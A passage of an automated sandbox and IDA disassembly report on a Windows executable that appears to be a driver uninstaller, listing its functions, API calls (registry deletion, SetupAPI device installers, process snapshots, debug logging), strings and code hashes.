                                    • Part of subcall function 0040BBAC: __mbsicmp_l.LIBCMT ref: 0040BBB6
                                  • CloseHandle.KERNEL32(00000000), ref: 004078C2
                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000002,00000000), ref: 004078E5
                                  Strings
                                  • UninstCommandClass::GetProcessId, xrefs: 004077FE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: _memset$CloseCreateHandleProcess32SnapshotTimeToolhelp32_fputs$DebugFirstFormatLocalMutexNextObjectOutputReleaseSingleStringWait__mbsicmp_l_fprintf
                                  • String ID: UninstCommandClass::GetProcessId
                                  • API String ID: 4235377104-1341712864
                                  • Opcode ID: 5afd117d8137f10938b5f1beeb4c3c6a449cb5e6f52a3a520e91c39e3a799413
                                  • Instruction ID: ca748b6b6f4099698702880440fb671c556b27bd1886daaaa6dd1b1c0e2b8d6e
                                  • Opcode Fuzzy Hash: 5afd117d8137f10938b5f1beeb4c3c6a449cb5e6f52a3a520e91c39e3a799413
                                  • Instruction Fuzzy Hash: 6521B6715083006BE220FB559C4ABAB73ECDF84705F00443EF958A62C1EB78A608C6AF
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • GetClientRect.USER32(?,?), ref: 00401BEE
                                  • GetWindowRect.USER32(?,?), ref: 00401C06
                                  • BeginDeferWindowPos.USER32(00000001), ref: 00401C46
                                  • DeferWindowPos.USER32(00000000,?,000000FE,?,?,00000032,00000032,00000045), ref: 00401C5A
                                  • EndDeferWindowPos.USER32(00000000), ref: 00401C61
                                  • ShowWindow.USER32(?,00000001), ref: 00401C6A
                                  • UpdateWindow.USER32(?), ref: 00401C71
                                  Strings
                                  • CommandClass::ShowSplash, xrefs: 00401BD7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Window$Defer$RectTime_fputs$BeginClientDebugFormatLocalMutexObjectOutputReleaseShowSingleStringUpdateWait_fprintf
                                  • String ID: CommandClass::ShowSplash
                                  • API String ID: 183207305-2159241333
                                  • Opcode ID: d7f09084c86c9a10c80aef94f3f7b95fa1bc23e71c02ecf9e232bfa91940cde6
                                  • Instruction ID: fe13c39e3d2608dd657741dee590182fd192bab57f398855da69cc361005ee78
                                  • Opcode Fuzzy Hash: d7f09084c86c9a10c80aef94f3f7b95fa1bc23e71c02ecf9e232bfa91940cde6
                                  • Instruction Fuzzy Hash: 7811BE722003096FC314DB388D49DAB7BADEBC8351F09462CBA16D3291DA24E8088BA5
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 004051BA
                                  • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 004051E9
                                  • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,?), ref: 00405239
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: EnumInfoOpenQuery
                                  • String ID: NULL$UninstCommandClass::NvRegEnumAndDeleteSubKeys(HKEY,%s,%s)
                                  • API String ID: 1906016947-1079483241
                                  • Opcode ID: ba24c0bd6675a1cf136ed3de6474397ff31bf88f88f1728414760d51e5e31da4
                                  • Instruction ID: b9939a5010867bf7737fe1208572260fbde61c2ed9772f49c17cd458b6d82167
                                  • Opcode Fuzzy Hash: ba24c0bd6675a1cf136ed3de6474397ff31bf88f88f1728414760d51e5e31da4
                                  • Instruction Fuzzy Hash: 8441BF316043459BD720CF24DC85BABB7E9EF88714F444A2DF994A7280E774A908CB9A
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • SetupDiSetSelectedDevice.SETUPAPI(?,?), ref: 0040932D
                                  • _memset.LIBCMT ref: 0040934A
                                  • SetupDiSetDeviceInstallParamsA.SETUPAPI(?,?,00000128), ref: 00409389
                                  • SetupDiCallClassInstaller.SETUPAPI(00000016,?,?), ref: 00409397
                                  • SetupDiBuildDriverInfoList.SETUPAPI(?,?,00000002), ref: 004093A5
                                  • SetupDiDestroyDriverInfoList.SETUPAPI(?,?,00000002), ref: 00409420
                                  Strings
                                  • UninstCommandClass::InstallDeviceCallBack, xrefs: 0040931A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Setup$DeviceDriverInfoListTime_fputs$BuildCallClassDebugDestroyFormatInstallInstallerLocalMutexObjectOutputParamsReleaseSelectedSingleStringWait_fprintf_memset
                                  • String ID: UninstCommandClass::InstallDeviceCallBack
                                  • API String ID: 2604346630-2910946198
                                  • Opcode ID: 827232f7c0347f3a07f41d42ca0f6bc79bddd5940d63469b9b8f40e83be7c7eb
                                  • Instruction ID: 382feb36e514dc5934cb95c373b2ec22359372e3c983ae7f33deb5fd3f0ffb83
                                  • Opcode Fuzzy Hash: 827232f7c0347f3a07f41d42ca0f6bc79bddd5940d63469b9b8f40e83be7c7eb
                                  • Instruction Fuzzy Hash: 47316F72604345AFD210DB60DC45EBF73A8EBC8748F44493DF946A72C2DB789C0987A6
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • CoCreateInstance.OLE32(00421400,00000000,00000001,00421330,?), ref: 004082FD
                                  • SysStringLen.OLEAUT32(00000000), ref: 00408321
                                  • Sleep.KERNEL32(000003E8), ref: 00408364
                                  • SysFreeString.OLEAUT32(00000000), ref: 0040836F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: String$Time_fputs$CreateDebugFormatFreeInstanceLocalMutexObjectOutputReleaseSingleSleepWait_fprintf
                                  • String ID: ConnectToNamespace$Root\WMI
                                  • API String ID: 977819115-3538068258
                                  • Opcode ID: 367d0bb582838942f685d447f89c034ea213efdbe855f548ba1f2da10da360d6
                                  • Instruction ID: d4aa90a0350b6affff37f79d485cc322f1fb7b921a80e8e8632ff4c7574bdc84
                                  • Opcode Fuzzy Hash: 367d0bb582838942f685d447f89c034ea213efdbe855f548ba1f2da10da360d6
                                  • Instruction Fuzzy Hash: B2310335740300AFD610DB69EC81F5FB399EBC4B10F24852AFA88D73D0DA3AE80587A5
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 004052D5
                                  • RegDeleteValueA.ADVAPI32(?,?), ref: 004052E9
                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 004052F9
                                    • Part of subcall function 004050E0: RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 004051BA
                                    • Part of subcall function 004050E0: RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 004051E9
                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00405313
                                  • GetLastError.KERNEL32 ref: 00405319
                                  • RegCloseKey.ADVAPI32(?), ref: 00405330
                                  Strings
                                  • UninstCommandClass::NvRegDeleteKeyNT, xrefs: 004052A7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Delete$OpenTime_fputs$CloseDebugErrorFormatInfoLastLocalMutexObjectOutputQueryReleaseSingleStringValueWait_fprintf
                                  • String ID: UninstCommandClass::NvRegDeleteKeyNT
                                  • API String ID: 628836260-4137488362
                                  • Opcode ID: 320164d62f16311af865955130db9309a5d6561766e9063156227dd01fbcb1e9
                                  • Instruction ID: 29a9d018e0bd542de6d2119d5640a19205c346277f682fa9cb1fc162e634e8b2
                                  • Opcode Fuzzy Hash: 320164d62f16311af865955130db9309a5d6561766e9063156227dd01fbcb1e9
                                  • Instruction Fuzzy Hash: 39115171604714ABC710DF22AC48E6BBBACFB88795F44483DB955A3250DB78ED04CBA9
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • SetupDiCallClassInstaller.SETUPAPI(?,?,?), ref: 004067C0
                                  • _memset.LIBCMT ref: 004067D9
                                  • SetupDiGetDeviceInstallParamsA.SETUPAPI ref: 004067F0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: SetupTime_fputs$CallClassDebugDeviceFormatInstallInstallerLocalMutexObjectOutputParamsReleaseSingleStringWait_fprintf_memset
                                  • String ID: Class installer %s a reboot$UninstCommandClass::NvUninstCallClassInstaller$doesn't require$requires
                                  • API String ID: 411429485-695916807
                                  • Opcode ID: bbc810f8c69c1c04220c4bc6e2449fe2ca617bf85757c3a969a0e9037ffc1285
                                  • Instruction ID: 3a03dc70e95dcd0f9d0dfb85e2f5997b9cfde918ff3b78563f1fa6d51592affe
                                  • Opcode Fuzzy Hash: bbc810f8c69c1c04220c4bc6e2449fe2ca617bf85757c3a969a0e9037ffc1285
                                  • Instruction Fuzzy Hash: 4B11E3716053406BD220EF58DC45FEFBBE8EF98305F04483EB44897291DB789A1887DA
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: __sopen_s
                                  • String ID: $UNICODE$UTF-16LE$UTF-8$ccs=
                                  • API String ID: 2693426323-1656882147
                                  • Opcode ID: 7b4a3ac31289e3211d80225ae70a71ebf49ae5dce4e9220ca253acfa1b6a6d69
                                  • Instruction ID: d5db8d6a7bb4df7894db12632077b3b1d5c33c3903a0276cd580189d641943cf
                                  • Opcode Fuzzy Hash: 7b4a3ac31289e3211d80225ae70a71ebf49ae5dce4e9220ca253acfa1b6a6d69
                                  • Instruction Fuzzy Hash: 7271B271904209AFDF248F5586453EB7BA0AB00314F24C06FE859E62D1D7FC8AE28F4D
                                  APIs
                                  • getSystemCP.LIBCMT ref: 0040E617
                                    • Part of subcall function 0040E584: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040E591
                                    • Part of subcall function 0040E584: GetOEMCP.KERNEL32(00000000), ref: 0040E5AB
                                  • setSBCS.LIBCMT ref: 0040E629
                                    • Part of subcall function 0040E301: _memset.LIBCMT ref: 0040E314
                                  • IsValidCodePage.KERNEL32(-00000030), ref: 0040E66F
                                  • GetCPInfo.KERNEL32(00000000,?), ref: 0040E682
                                  • _memset.LIBCMT ref: 0040E69A
                                  • setSBUpLow.LIBCMT ref: 0040E76D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Locale_memset$CodeInfoPageSystemUpdateUpdate::_Valid
                                  • String ID:
                                  • API String ID: 2658552758-0
                                  • Opcode ID: b9a06a9f12667d6689ceee42e5f1632b56583e13c156d34b7b19591f98919917
                                  • Instruction ID: 118644a9b875480cf5c774309ac6f097de70fa0ab39b048be9a5e0c4ab42d155
                                  • Opcode Fuzzy Hash: b9a06a9f12667d6689ceee42e5f1632b56583e13c156d34b7b19591f98919917
                                  • Instruction Fuzzy Hash: 745106319042548BDF259F66C8846BEBBF4EF05304F14887FD881AB2C2D63D9862CB98
                                  APIs
                                    • Part of subcall function 0040B58A: __mbschr_l.LIBCMT ref: 0040B594
                                  • _sscanf.LIBCMT ref: 00402664
                                    • Part of subcall function 0040BBAC: __mbsicmp_l.LIBCMT ref: 0040BBB6
                                  • _fprintf.LIBCMT ref: 004026F0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: __mbschr_l__mbsicmp_l_fprintf_sscanf
                                  • String ID: %s %s$CommandClass::Execute(%s)$Execute: unknown command$NULL
                                  • API String ID: 1777824336-125213581
                                  • Opcode ID: 8cfe0e35b7d91d4407ab049514371496b79488eda76f4aa58d6943b870c35c3f
                                  • Instruction ID: 920062bc3e6fd7872550115d0e9e6481160d8355d39fa3b0ec2652908e8cf63b
                                  • Opcode Fuzzy Hash: 8cfe0e35b7d91d4407ab049514371496b79488eda76f4aa58d6943b870c35c3f
                                  • Instruction Fuzzy Hash: 0631277260420027C600BA7A5D55E6B369CDE91329B14093FF840B73D2EE7ED90441FE
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • _memset.LIBCMT ref: 0040A8DC
                                  • GetPrivateProfileStringA.KERNEL32(?,?,(error),?,00000080,?), ref: 0040A8FB
                                    • Part of subcall function 0040BBAC: __mbsicmp_l.LIBCMT ref: 0040BBB6
                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 0040A936
                                  Strings
